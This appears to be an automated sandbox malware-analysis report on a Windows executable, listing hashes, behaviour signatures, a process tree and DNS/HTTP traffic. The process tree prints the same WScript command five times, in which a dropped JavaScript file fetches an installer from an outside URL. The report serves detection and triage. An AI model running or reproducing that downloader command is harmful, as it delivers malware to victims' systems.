Overview

overview

8

Static

static

3

f6d885fd76...18.exe

windows7-x64

8

f6d885fd76...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    135s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/09/2024, 20:57 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    f6d885fd766bea14a67d5302ca3d258f

  • SHA1

    044e4aa23ea461d70f73bd9bcd5365d0c9ded3f8

  • SHA256

    5a531abdbc9327c04035951f175682d0272c0c62f484b8adb7e0c8fc97fe397b

  • SHA512

    0d7ed97b9c05cff41fc81597a4cd932e1d2e3c8ee0a9d8108fafb7d43448e46d2db52558f87091832048a90c1d11085f6eaa1161cd220b7568f32c8c5d903cf2

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3l:/7BSH8zUB+nGESaaRvoB7FJNndns

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:1852
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:4308
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:392
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:4144
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:640

Network

  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-5.hugedomains.com
    traff-5.hugedomains.com
    IN CNAME
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    IN A
    34.205.242.146
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    IN A
    54.161.222.85
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Wed, 25 Sep 2024 20:57:40 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    101.209.201.84.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    101.209.201.84.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    146.242.205.34.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.242.205.34.in-addr.arpa
    IN PTR
    Response
    146.242.205.34.in-addr.arpa
    IN PTR
    ec2-34-205-242-146 compute-1 amazonawscom
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-4.hugedomains.com
    traff-4.hugedomains.com
    IN CNAME
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    IN A
    3.94.41.167
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    IN A
    52.86.6.113
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.94.41.167:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Wed, 25 Sep 2024 20:57:54 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    172.67.70.191
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    104.26.6.37
  • flag-us
    DNS
    167.41.94.3.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.41.94.3.in-addr.arpa
    IN PTR
    Response
    167.41.94.3.in-addr.arpa
    IN PTR
    ec2-3-94-41-167 compute-1 amazonawscom
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.94.41.167:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Wed, 25 Sep 2024 20:58:05 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    110.11.19.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    110.11.19.2.in-addr.arpa
    IN PTR
    Response
    110.11.19.2.in-addr.arpa
    IN PTR
    a2-19-11-110deploystaticakamaitechnologiescom
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.94.41.167:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Wed, 25 Sep 2024 20:58:18 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.94.41.167:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Wed, 25 Sep 2024 20:58:30 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    79.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.190.18.2.in-addr.arpa
    IN PTR
    Response
    79.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-79deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    99.209.201.84.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.209.201.84.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.179.89.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.179.89.13.in-addr.arpa
    IN PTR
    Response
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
     283 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.94.41.167:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
     283 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.94.41.167:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
     283 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.94.41.167:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
     283 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 3.94.41.167:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
     283 B
     6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
     139 B
     1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
     191 B
     1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    34.205.242.146
    54.161.222.85

  • 8.8.8.8:53
    101.209.201.84.in-addr.arpa
    dns
    73 B
     133 B
     1
    1

    DNS Request

    101.209.201.84.in-addr.arpa

  • 8.8.8.8:53
    146.242.205.34.in-addr.arpa
    dns
    73 B
     129 B
     1
    1

    DNS Request

    146.242.205.34.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    120 B
     278 B
     2
    2

    DNS Request

    www.djapp.info

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
     191 B
     1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.94.41.167
    52.86.6.113

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
     113 B
     1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    172.67.70.191
    104.26.7.37
    104.26.6.37

  • 8.8.8.8:53
    167.41.94.3.in-addr.arpa
    dns
    70 B
     123 B
     1
    1

    DNS Request

    167.41.94.3.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
     139 B
     1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    110.11.19.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    110.11.19.2.in-addr.arpa

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    120 B
     139 B
     2
    1

    DNS Request

    www.djapp.info

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
     139 B
     1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    79.190.18.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    79.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    99.209.201.84.in-addr.arpa
    dns
    72 B
     132 B
     1
    1

    DNS Request

    99.209.201.84.in-addr.arpa

  • 8.8.8.8:53
    13.179.89.13.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    13.179.89.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fufAFD7.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.